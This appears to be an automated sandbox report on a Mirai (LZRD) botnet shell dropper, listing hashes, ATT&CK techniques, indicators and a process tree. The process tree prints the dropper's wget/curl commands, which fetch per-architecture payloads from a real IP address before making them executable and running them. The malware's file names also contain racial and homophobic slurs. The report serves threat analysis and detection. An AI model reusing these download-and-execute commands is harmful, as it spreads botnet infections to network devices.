mirai | 9724ec0ed2f79f63d1e62dbf2da4a1ffe5b81d8446230f33795427bba5a57e3a

Analysis

max time kernel
16s
max time network
19s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
18-01-2025 04:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

GODLYBINSNIGGAYOUCANTCRACKTHESEBITCH11111222268.sh
Size

4KB
MD5

c458138484ec7b830d632fd383d3d321
SHA1

0e7c076b71401207c7568f50f897110ea98f9d73
SHA256

9724ec0ed2f79f63d1e62dbf2da4a1ffe5b81d8446230f33795427bba5a57e3a
SHA512

e0a9fb2dcae645581a9f57372d93c30b6b4c906fc888582e91c4ef0de4b6dce961bcca0440f56164ad5354de41e91aab0fcb38dbee4fd0b7db2249fe75cd01fd
SSDEEP

48:vXkTv3X9CTXiFLXF6vX/4vXL02th3Xri5lXodNL3X7E2aLX877JX9CTXJ+LX2ZTS:v6aiqGtDis3kL2K+WriR

Score

10^/10

mirai lzrd antivm botnet defense_evasion discovery upx

Malware Config

Extracted

Family

mirai

Botnet

LZRD

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai

File and Directory Permissions Modification 1 TTPs 4 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
686	chmod
707	chmod
729	chmod
743	chmod

Executes dropped EXE 4 IoCs

ioc	pid	Process
/tmp/HAHAWTFNIGGA	687	HAHAWTFNIGGA
/tmp/HAHAWTFNIGGA	709	HAHAWTFNIGGA
/tmp/HAHAWTFNIGGA	731	HAHAWTFNIGGA
/tmp/HAHAWTFNIGGA	744	HAHAWTFNIGGA

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/fstream-1.dat	upx
behavioral2/files/fstream-4.dat	upx

Checks CPU configuration 1 TTPs 4 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

description	ioc	Process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 8 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

System Network Configuration Discovery 1 TTPs 4 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
690	wget
701	curl
705	cat
709	HAHAWTFNIGGA

Writes file to tmp directory 8 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_x86	curl
File opened for modification	/tmp/HAHAWTFNIGGA	GODLYBINSNIGGAYOUCANTCRACKTHESEBITCH11111222268.sh
File opened for modification	/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_mips	wget
File opened for modification	/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_mips	curl
File opened for modification	/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_arc	wget
File opened for modification	/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_arc	curl
File opened for modification	/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_i468	curl
File opened for modification	/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_x86	wget

/tmp/GODLYBINSNIGGAYOUCANTCRACKTHESEBITCH11111222268.sh
/tmp/GODLYBINSNIGGAYOUCANTCRACKTHESEBITCH11111222268.sh
1⤵
- Writes file to tmp directory
PID:647
- /usr/bin/wget
  wget http://94.158.245.27/GOONGANGONTOP/YOUCANTGETTHESEBINSFAGGOT12322257_x86
  2⤵
  - Writes file to tmp directory
  PID:650
- /usr/bin/curl
  curl -O http://94.158.245.27/GOONGANGONTOP/YOUCANTGETTHESEBINSFAGGOT12322257_x86
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:678
- /bin/cat
  cat YOUCANTGETTHESEBINSFAGGOT12322257_x86
  2⤵
  PID:685
- /bin/chmod
  chmod +x GODLYBINSNIGGAYOUCANTCRACKTHESEBITCH11111222268.sh HAHAWTFNIGGA systemd-private-806c12d3ba1b433dbef9e362c58cc6bf-systemd-timedated.service-nXGaGY YOUCANTGETTHESEBINSFAGGOT12322257_x86
  2⤵
  - File and Directory Permissions Modification
  PID:686
- /tmp/HAHAWTFNIGGA
  ./HAHAWTFNIGGA payload.x86
  2⤵
  - Executes dropped EXE
  PID:687
- /usr/bin/wget
  wget http://94.158.245.27/GOONGANGONTOP/YOUCANTGETTHESEBINSFAGGOT12322257_mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:690
- /usr/bin/curl
  curl -O http://94.158.245.27/GOONGANGONTOP/YOUCANTGETTHESEBINSFAGGOT12322257_mips
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:701
- /bin/cat
  cat YOUCANTGETTHESEBINSFAGGOT12322257_mips
  2⤵
  - System Network Configuration Discovery
  PID:705
- /bin/chmod
  chmod +x GODLYBINSNIGGAYOUCANTCRACKTHESEBITCH11111222268.sh HAHAWTFNIGGA systemd-private-806c12d3ba1b433dbef9e362c58cc6bf-systemd-timedated.service-nXGaGY YOUCANTGETTHESEBINSFAGGOT12322257_mips YOUCANTGETTHESEBINSFAGGOT12322257_x86
  2⤵
  - File and Directory Permissions Modification
  PID:707
- /tmp/HAHAWTFNIGGA
  ./HAHAWTFNIGGA payload.mips
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:709
- /usr/bin/wget
  wget http://94.158.245.27/GOONGANGONTOP/YOUCANTGETTHESEBINSFAGGOT12322257_arc
  2⤵
  - Writes file to tmp directory
  PID:712
- /usr/bin/curl
  curl -O http://94.158.245.27/GOONGANGONTOP/YOUCANTGETTHESEBINSFAGGOT12322257_arc
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:719
- /bin/cat
  cat YOUCANTGETTHESEBINSFAGGOT12322257_arc
  2⤵
  PID:727
- /bin/chmod
  chmod +x GODLYBINSNIGGAYOUCANTCRACKTHESEBITCH11111222268.sh HAHAWTFNIGGA systemd-private-806c12d3ba1b433dbef9e362c58cc6bf-systemd-timedated.service-nXGaGY YOUCANTGETTHESEBINSFAGGOT12322257_arc YOUCANTGETTHESEBINSFAGGOT12322257_mips YOUCANTGETTHESEBINSFAGGOT12322257_x86
  2⤵
  - File and Directory Permissions Modification
  PID:729
- /tmp/HAHAWTFNIGGA
  ./HAHAWTFNIGGA payload.arc
  2⤵
  - Executes dropped EXE
  PID:731
- /usr/bin/wget
  wget http://94.158.245.27/GOONGANGONTOP/YOUCANTGETTHESEBINSFAGGOT12322257_i468
  2⤵
  PID:734
- /usr/bin/curl
  curl -O http://94.158.245.27/GOONGANGONTOP/YOUCANTGETTHESEBINSFAGGOT12322257_i468
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:737
- /bin/cat
  cat YOUCANTGETTHESEBINSFAGGOT12322257_i468
  2⤵
  PID:742
- /bin/chmod
  chmod +x GODLYBINSNIGGAYOUCANTCRACKTHESEBITCH11111222268.sh HAHAWTFNIGGA systemd-private-806c12d3ba1b433dbef9e362c58cc6bf-systemd-timedated.service-nXGaGY YOUCANTGETTHESEBINSFAGGOT12322257_arc YOUCANTGETTHESEBINSFAGGOT12322257_i468 YOUCANTGETTHESEBINSFAGGOT12322257_mips YOUCANTGETTHESEBINSFAGGOT12322257_x86
  2⤵
  - File and Directory Permissions Modification
  PID:743
- /tmp/HAHAWTFNIGGA
  ./HAHAWTFNIGGA payload.i486
  2⤵
  - Executes dropped EXE
  PID:744
- /usr/bin/wget
  wget http://94.158.245.27/GOONGANGONTOP/YOUCANTGETTHESEBINSFAGGOT12322257_i686
  2⤵
  PID:745

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

System Network Configuration Discovery

T1016

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_arc

Filesize
121KB

MD5
b2137fad57343a2c54f4167b42c52b4f

SHA1
3e2dfcd9b129e9502ef854f7451f7299812036ba

SHA256
cdd7d9565af3469b9a821239429b637797480fdc5e7f42095b948da44fe47921

SHA512
e9e5db39f798746dd16435db13548964d6e71f3002fb6123e7f0f3436c8f340a394701acf87b00bcce9c5176e89c0d46bf33ca51184d78ad7928a77cdff91d3c

Download Submit
/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_i468

Filesize
250B

MD5
b32e06510115090646e59678f1583ff8

SHA1
34a0f3de9eae2379c20ca6c0681d513e100a0fb9

SHA256
c8e94d7c390d5b8077a811d03aa72e21ca8f3cb740e111349dc75fb056984258

SHA512
1841bb5a14b6390a4c4b8e5db61be9eb62766877d39161f4a385c957508ebce83355b9d3e3fef300b17cb216d7f00da06b06beeb9bc273adb58996db9b5fe432

Download Submit
/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_mips

Filesize
31KB

MD5
21165b8b4e986efc031cd41016dde6b6

SHA1
39ce8fe9071745d8f2f5493b243376dbd5418a36

SHA256
a61b712082a6c62842aa60f98806b2daf292a54119ae5f4d422fee3239fc5c86

SHA512
96a0d5ee860f38716f07780d9b47949851f6cc8284d17278d0a432b36a1dfd879966c160abb43ef294bfd6047504f84019ae51639f8ede3e00ab76502671c0ed

Download Submit
/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_x86

Filesize
29KB

MD5
545dbe1d228295c958b5a3f6ec4d8278

SHA1
f8dff366ea07681be596cdb33911c3f4119d0763

SHA256
a8cbba23e7c866ccf3dc8b4d4e1cc5a51de83272cb6f8df8746a51a2817d8f7b

SHA512
fe2115ad64b5755a4b4d71660d8de94c0a7f3f7d9eb3519a6e82216621f83d0855a32c41963b22dabac02e9d82c95cca8efce568d2fdafd8123e4f443c335a3f

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads